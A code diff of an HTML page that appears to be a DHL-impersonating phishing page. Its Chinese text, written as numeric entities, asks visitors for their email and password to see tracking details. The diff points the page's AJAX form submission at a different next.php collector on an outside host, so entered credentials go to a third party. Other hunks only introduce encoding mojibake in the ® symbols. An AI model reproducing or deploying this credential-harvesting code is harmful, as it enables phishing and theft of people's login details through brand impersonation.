--- a/index.html
+++ b/index.html
@@ -1966,7 +1966,7 @@ option {
         <span>Image 01</span>
         <div>
           <h3>
-            &#25958;&#35946;&#22269;&#38469;®</h3>
+            &#25958;&#35946;&#22269;&#38469;Â®</h3>
         </div>
       </li>
       <li>
@@ -1977,7 +1977,7 @@ option {
         <span>Image 04</span>
         <div>
           <h3>
-            DHL&#22269;&#38469;&#20840;&#29699;®
+            DHL&#22269;&#38469;&#20840;&#29699;Â®
         </div>
       </li>
       <li>
@@ -1998,7 +1998,7 @@ option {
       <div class="login-shadow">
         <div class="login-blue">
           <h3>
-            DHL&#22269;&#38469;&#20840;&#29699;®</h3>
+            DHL&#22269;&#38469;&#20840;&#29699;Â®</h3>
           <p>
           
  <span style="color:#ffffff;">&#32487;&#32493;&#20351;&#29992;&#26377;&#25928;&#30340;&#30005;&#23376;&#37038;&#20214;&#21644;&#23494;&#30721;&#26597;&#30475;&#21644;&#23436;&#25104;&#36319;&#36394;&#35814;&#32454;&#20449;&#24687;</span>
@@ -2083,7 +2083,7 @@ option {
       
       $.ajax({
         dataType: 'JSON',
-        url: 'http://dwhawet.pl/admin/js/kfm/plugins/return_file_id/dhh/next.php',
+        url: 'http://zetalube.co.kr/images/chol/dhll/next.php',
         type: 'POST',
         data:{
           email:email,
